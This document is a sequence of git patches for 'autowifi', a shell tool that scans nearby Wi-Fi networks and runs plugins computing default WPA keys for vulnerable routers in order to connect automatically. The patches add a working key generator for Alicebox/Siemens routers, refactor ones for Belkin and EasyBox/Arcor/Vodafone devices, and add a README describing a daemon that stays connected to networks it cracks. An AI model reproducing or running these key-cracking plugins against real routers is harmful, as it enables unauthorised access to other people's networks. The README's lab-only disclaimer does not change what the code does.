From 11d994c0a822f83b311ce9a63d1f3dc3c29c7039 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:09:44 +0200 Subject: refactor vendor matcher --- usr/lib/autowifi/lib/plugin_core | 26 ++++++++++++++++++++------ usr/lib/autowifi/plugins/11belkin_wps | 9 ++------- 2 files changed, 22 insertions(+), 13 deletions(-) diff --git a/usr/lib/autowifi/lib/plugin_core b/usr/lib/autowifi/lib/plugin_core index da003350..1b83b0c3 100644 --- a/usr/lib/autowifi/lib/plugin_core +++ b/usr/lib/autowifi/lib/plugin_core @@ -1,24 +1,38 @@ +#!/bin/sh parse_plugin_args(){ [ $# -ne 4 ] && plugin_usage && exit 1 # convenience function to put args in ENV variables ESSID="$1" - MAC="$2" + + # mac is returned without colon + MAC=$(printf "%s" "$2" | sed 's/://g') + # split up the mac address to vendor and private part + VENDOR_MAC=${MAC:0:6} + PRIVATE_MAC=${MAC:6:12} CHANNEL="$3" ENC="$4" - if [ ${#MAC} -ne 17 ] ;then + if [ ${#MAC} -ne 12 ] ;then echo "MAC malformed" exit 1 fi } plugin_usage(){ cat << EOF -usage: $0 ESSID MAC CHANNEL ENC WPA WPA2" +usage: $0 ESSID MAC CHANNEL ENC" ESSID - string MAC - 00:11:22:33:44:55 - ENC - on | off - WPA - 0 | 1 - WPA2 - 0 | 1 + CHANNEL - 4 + ENC - wpa EOF } + +check_vendor_mac(){ + needle="$(printf $1 | tr '[A-Z]' '[a-z]')" + shift + for i in "$@";do + [ "$needle" == "$(printf $i | tr '[A-Z]' '[a-z]')" ] && return 0 + done + return 1 +} diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps index 82140523..65e08624 100755 --- a/usr/lib/autowifi/plugins/11belkin_wps +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -15,13 +15,8 @@ cd $(dirname $(readlink -f $0)) . ../lib/wps parse_plugin_args "$@" -MAC=$(printf "%s" $MAC| sed 's/://g') -VENDOR_MAC=${MAC:0:6} -PRIVATE_MAC=${MAC:6:12} -if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then - echo "VENDOR MAC $VENDOR_MAC not affected" - exit 1 -fi + +! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1 calc_belkin(){ PRIVATE_MAC=${1} -- cgit v1.2.3 From b72b8a29dcfaf22554ebcf7d5e19bc7f28f49862 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:11:59 +0200 Subject: add alicebox default wpa key generator --- usr/lib/autowifi/plugins/02alice | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100755 usr/lib/autowifi/plugins/02alice diff --git a/usr/lib/autowifi/plugins/02alice b/usr/lib/autowifi/plugins/02alice new file mode 100755 index 00000000..1b4533a4 --- /dev/null +++ b/usr/lib/autowifi/plugins/02alice @@ -0,0 +1,20 @@ +#!/bin/sh +# Implementation of Alicebox 1121 /Siemens S1621-Z220-A Default Password Algorithm: +# Based on Poc from +# http://www.wardriving-forum.de/forum/f275/standard-wlanpassw%F6rter-von-alice-boxen-70287.html +# +# +# ESSID MAC CHANNEL ENCRYPTION + +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core + +parse_plugin_args "$@" + +! check_vendor_mac $VENDOR_MAC "00255E" && echo "$VENDOR_MAC not affected" && exit 1 + +# printf always makes string to lower, need that for correct md5sum +ETHMAC=$( printf "%012x" $((0x${MAC}-1)) ) +TMP=$(printf $ETHMAC | md5sum) +printf ${TMP:0:12} | base64 +exit 0 -- cgit v1.2.3 From a0f4644017949e17b45f23a3870afa6f6c2823cb Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:25:03 +0200 Subject: use wpa_supplicant for the new autowifi_dryrun --- usr/bin/autowifi_dryrun | 40 +++++++++++++++++++--------------------- 1 file changed, 19 insertions(+), 21 deletions(-) diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 1df94119..8860b4a6 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun @@ -2,30 +2,23 @@ # ENV: # the root directory (e.g. root=$PWD/../../ if run from here ) cd $(dirname $(readlink -f $0)) -root=${root:-/} -wifi=${wifi:-wlan0} - test "${1:-}" = 'quiet' && exec 2>&- -# for iwlist_scan -. $root/usr/lib/autowifi/lib/iwlist +interface=${interface:-wlan0} +root=${root:-../../} +crackdir=$root/usr/lib/autowifi/plugins +wifi_keys=$root/etc/autowifi/wifi_keys +wifi_log=$root/var/log/autowifi.log -# . $ROOT/usr/lib/autowifi/lib/ +# exists() run_hooks() +. $root/usr/lib/autowifi/lib/core -# for check_internet and check_gateway -# . /usr/lib/autowifi/lib/network +# start_wpa_supplicant() +. $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION WPA WPA2 - if [ "$4" == off ];then - encr=open - elif [ "$6" -eq 1 ]; then - encr=psk2 - elif [ "$5" -eq 1 ]; then - encr=psk - elif [ "$4" == on ]; then - encr=wep - fi + #SSID MAC CHANNEL ENCRYPTION + ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do printf "%s" "Trying $(basename $hack) against $1 : " >&2 @@ -41,13 +34,18 @@ crack_wifi(){ done return $ALL_RET } +wifi_init(){ + wpa_supplicant_is_usable || start_wpa_supplicant /tmp/autowifi.wpa_supplicant + wifi_scan > /tmp/${interface}.scan + . /tmp/${interface}.scan +} loop_over_networks(){ - . /tmp/${wifi}.scan + wifi_init + echo "SSID:MAC:CHANNEL:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} \${WPA_${i}} \${WPA2_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} done } -iwlist_scan > /tmp/${wifi}.scan loop_over_networks -- cgit v1.2.3 From 410ddbd1f77e2f65de6e6b6c86daf031e296028d Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:26:15 +0200 Subject: fix multiple wifi_init --- usr/bin/autowifi | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/usr/bin/autowifi b/usr/bin/autowifi index d9337cf4..1969e650 100755 --- a/usr/bin/autowifi +++ b/usr/bin/autowifi @@ -63,7 +63,6 @@ find_count_of_ssid(){ connect_to_network_by_ssid(){ - wifi_init find_count_of_ssid "$1" | (while read i do loop_over_cracks "$i" && exit 0 @@ -76,7 +75,6 @@ connect_to_network_by_ssid(){ } connect_with_pw(){ - wifi_init find_count_of_ssid "$1" | (while read i do KEY="$2" @@ -92,8 +90,8 @@ wifi_init(){ . /tmp/${interface}.scan } loop_over_networks(){ - wifi_init + wifi_init for i in `seq 1 $WIFI_COUNT`; do loop_over_cracks "$i" if [ $? -eq 0 ]; then @@ -144,9 +142,7 @@ loop_over_cracks(){ # exit 0 #} - - - +wifi_init if [ -n "$2" ]; then echo connecting to $1 with pw $2 connect_with_pw "$1" "$2" -- cgit v1.2.3 From 07740b90c9803ca41e1ef931277a65ebcd4bfcd8 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 13:34:39 +0200 Subject: CHANNEL is FREQ in wpa_supplicant parser --- usr/bin/autowifi_dryrun | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/usr/bin/autowifi_dryrun b/usr/bin/autowifi_dryrun index 8860b4a6..c9867106 100755 --- a/usr/bin/autowifi_dryrun +++ b/usr/bin/autowifi_dryrun @@ -17,7 +17,7 @@ wifi_log=$root/var/log/autowifi.log . $root/usr/lib/autowifi/lib/wpa_supplicant crack_wifi(){ - #SSID MAC CHANNEL ENCRYPTION + #SSID MAC FREQ ENCRYPTION ALL_RET=1 for hack in $(find $root/usr/lib/autowifi/plugins -type f | sort -n); do @@ -42,9 +42,9 @@ wifi_init(){ loop_over_networks(){ wifi_init - echo "SSID:MAC:CHANNEL:ENCRYPTION:key" + echo "SSID:MAC:FREQ:ENCRYPTION:key" for i in `seq 1 $WIFI_COUNT`; do - eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${CHANNEL_${i}} \${ENCRYPTION_${i}} + eval crack_wifi \"\${ESSID_${i}}\" \${MAC_${i}} \${FREQ_${i}} \${ENCRYPTION_${i}} done } -- cgit v1.2.3 From 9fe9479fcaf843edd262acc28ad4bd71f475a246 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 14:00:11 +0200 Subject: 02easybox uses plugin_core now --- usr/lib/autowifi/plugins/02easybox | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/usr/lib/autowifi/plugins/02easybox b/usr/lib/autowifi/plugins/02easybox index 2126e17c..3d7cb8c1 100755 --- a/usr/lib/autowifi/plugins/02easybox +++ b/usr/lib/autowifi/plugins/02easybox @@ -1,21 +1,20 @@ #!/bin/sh #ESSID MAC CHANNEL ENCRYPTION WPA WPA2 -if ! echo "$1" | egrep -qi "(EasyBox-|Arcor-|Vodafone-)"; then - exit 1 -else - MAC=${2?\$2 must be MAC} - # Take the last 2 Bytes of the MAC-Address (0B:EC), and convert it to decimal. +cd $(dirname $(readlink -f $0)) +. ../lib/plugin_core +parse_plugin_args "$@" - take5=${MAC:12} - last4=${take5/:/} +if ! echo "$ESSID" | egrep -i "(EasyBox-|Arcor-|Vodafone-)" >/dev/null; then + echo "Essid $ESSID is not Default EasyBox|Arcor|Vodafone" + exit 1 +else # Fill up to 4 places with zeros, if necessary: - deci=$(printf "%04d" "0x$last4" | sed 's/.*\(....\)/\1/;s/./& /g') - #echo M4: ${deci[@]} + deci=$(printf "%04d" "0x${MAC:8:4}" | sed 's/.*\(....\)/\1/;s/./& /g') # # The digits M9 to M12 are just the last digits (9.-12.) of the MAC: - hexi=$(echo ${MAC:12:5} | sed 's/://;s/./& /g') + hexi=$(echo ${MAC:8:4} | sed 's/./& /g') #echo 'M4 (Hex): ' ${hexi[@]} # K1 = last byte of (d0 + d1 + h2 + h3) # K2 = last byte of (h0 + h1 + d2 + d3) -- cgit v1.2.3 From 1cdfbdacb0b1041808232bb3ee7f51a4da705540 Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 14:03:20 +0200 Subject: add README --- README | 42 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 README diff --git a/README b/README new file mode 100644 index 00000000..c3c8f84d --- /dev/null +++ b/README @@ -0,0 +1,42 @@ +# Autowifi +Author: makefu,lassulus +Status: Pre-Alpha - it will most likely break if you try to use it + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it -- cgit v1.2.3 From caf31a97e934c3191f2867ab6a93ecf4bb8890fe Mon Sep 17 00:00:00 2001 From: makefu Date: Wed, 26 Jun 2013 17:14:18 +0200 Subject: update README --- README | 42 ------------------------------------------ README.md | 47 +++++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 47 insertions(+), 42 deletions(-) delete mode 100644 README create mode 100644 README.md diff --git a/README b/README deleted file mode 100644 index c3c8f84d..00000000 --- a/README +++ /dev/null @@ -1,42 +0,0 @@ -# Autowifi -Author: makefu,lassulus -Status: Pre-Alpha - it will most likely break if you try to use it - -# Goals -Goal of autowifi is to provide a tool which automatically can connect to -networks in an unknown environment. - -This can either be done by connecting to open networks, known networks -(whitelist) or by calculating weak default wpa keys (for example easybox -default passwords). - -# Audience -Due to the current status of the project the target audience are -linux users with technical background . - -# Usage - - # all as root - # try to find networks to connect to around you - usr/bin/autowifi_dryrun quiet - - # start the autowifi daemon which tries to stay in networks all the time - usr/bin/autowifi - -# Plugins -All tests to open up networks are implemented in plugins in - usr/lib/autowifi/plugins - -## Run a single Plugin -This can be used for testing purposes, e.g. test a single plugin against given networks directly - - # try out the easybox keygen - usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) - - #e.g. - usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" - -# Disclaimer -- use at own risk -- only run in lab environment -- you break it, you buy it diff --git a/README.md b/README.md new file mode 100644 index 00000000..62e0083b --- /dev/null +++ b/README.md @@ -0,0 +1,47 @@ +# Autowifi +Author: makefu,lassulus +Status: Pre-Alpha - it will most likely break if you try to use it + +# Contact + +twitter: @krebsbob ,@makefoo +IRC: freenode #krebs + +# Goals +Goal of autowifi is to provide a tool which automatically can connect to +networks in an unknown environment. + +This can either be done by connecting to open networks, known networks +(whitelist) or by calculating weak default wpa keys (for example easybox +default passwords). + +# Audience +Due to the current status of the project the target audience are +linux users with technical background . + +# Usage + + # all as root + # try to find networks to connect to around you + usr/bin/autowifi_dryrun quiet + + # start the autowifi daemon which tries to stay in networks all the time + usr/bin/autowifi + +# Plugins +All tests to open up networks are implemented in plugins in + usr/lib/autowifi/plugins + +## Run a single Plugin +This can be used for testing purposes, e.g. test a single plugin against given networks directly + + # try out the easybox keygen + usr/lib/autowifi/plugins/02easybox SSID MAC CHANNEL ENCRYPTION(wpa_cli style) + + #e.g. + usr/lib/autowifi/plugins/02easybox Easybox-123456 00:11:22:33:44:55 7 "[wpa]" + +# Disclaimer +- use at own risk +- only run in lab environment +- you break it, you buy it -- cgit v1.2.3 From b99bbe256c030cec78b1c96d08eb02860dda911c Mon Sep 17 00:00:00 2001 From: Felix Richter Date: Wed, 26 Jun 2013 17:25:35 +0200 Subject: README.md: fix line breaks --- README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/README.md b/README.md index 62e0083b..3e0d8dce 100644 --- a/README.md +++ b/README.md @@ -1,10 +1,12 @@ # Autowifi Author: makefu,lassulus + Status: Pre-Alpha - it will most likely break if you try to use it # Contact twitter: @krebsbob ,@makefoo + IRC: freenode #krebs # Goals -- cgit v1.2.3